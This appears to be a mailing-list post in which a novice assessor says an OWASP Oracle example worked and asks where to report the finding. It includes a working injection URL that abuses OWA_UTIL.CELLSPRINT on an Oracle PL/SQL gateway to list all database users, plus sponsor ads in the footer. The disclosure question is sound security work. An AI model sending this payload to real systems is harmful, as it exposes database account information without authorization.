Hi,
This is my first time doing a web application
assessment. I was reading reading an article about
Oracle assessment in OWASP and tried one of their
examples. To my surprise, by typing the URL below
on my web browser, revealed all the information
about ALL_USERS. I wonder what I can do with this
finding? Maybe you can point me to the proper
mailing list..
http:
//login.server.com/pls/orasso/orasso.home?);OWA_UTIL.CEL
LSPRINT(;1);--=SELECT+*
+FROM+ALL_USERS
Thanks
____________________________________________________________
________________________
Pinpoint customers who are looking for what you sell.
http://searchmarket
ing.yahoo.com/
------------------------------------------------------------
-------------
Sponsored by: Watchfire
Cross-Site Scripting (XSS) is one of the most common
application-level
attacks that hackers use to sneak into web applications
today. This
whitepaper will discuss how traditional XSS attacks are
performed, how to
secure your site against these attacks and check if your
site is protected.
Cross-Site Scripting Explained - Download this whitepaper
today!
https://www.watchfire.com/securearea/whi
tepapers.aspx?id=701700000009405
------------------------------------------------------------
-------------
|